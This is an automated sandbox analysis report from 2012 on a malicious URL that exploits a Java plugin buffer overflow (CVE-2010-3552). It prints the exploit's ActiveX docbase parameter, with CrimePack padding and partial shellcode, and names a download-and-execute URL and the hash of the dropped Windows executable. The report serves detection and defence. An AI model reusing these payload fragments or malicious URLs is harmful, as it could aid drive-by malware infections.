Analysis report for http://spider.hitstrack.in/mdl/bof.php
Sample Overview
| URL |
http://spider.hitstrack.in/mdl/bof.php |
| Domain | spider.hitstrack.in |
| Analysis Started |
2012-02-22 18:07:12 |
| Report Generated |
2012-02-22 18:07:15 |
| Jsand version |
2.3.2 |
See the report for domain spider.hitstrack.in.
Detection results
| Detector | Result |
|---|
| Jsand 2.3.2 |
malicious |
In particular, the following URL was found to contain malicious content:
- http://spider.hitstrack.in/mdl/bof.php
Exploits
| Name | Description | Reference |
|---|
| Java Plugin LaunchJNLP DocBase | Stack based buffer overflow in Oracle Java 6 | CVE-2010-3552 |
Deobfuscation results
Evals
No evals.
Writes
No writes.
Network Activity
Requests
| URL |
Status | Content Type |
|
http://spider.hitstrack.in/mdl/bof.php
| 200 | text/html |
Redirects
No redirects.
ActiveX controls
-
| CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA |
|---|
|
Name | Value |
|---|
| Attributes |
launchjnlp |
1 |
| docbase |
CRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPAC
KCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPA
CKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEP
other 400 bytes
f9J.u??\$.a??|`?l$$?E<?T.x.??J.?Z..??7I?4?.?1?1?????t.??..??????;|$(u??Z$.?f?.K?
Z..??.?.??D$.a????????N.?RP?????V???6./pRP?????1?RRSUR???.?=?Z????~??sRP?q???1?R
???i?B???????.RP?Y???1?????????????RS?????????urlmon.dll?load.exe?http://spider.
hitstrack.in/mdl/load.php?spl=java-docbase&b=&o=&i=java-docbase??. |
Shellcode
No shellcode was identified.
Malware
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|
| http://spider.hitstrack.in/mdl/load.php?spl=java-docbase&b=&o=&i=java-docbase??
|
PE32 executable for MS Windows (GUI) Intel 80386 32-bit |
969262186d7272ae4c08eff7e7420c40 |
|
Comments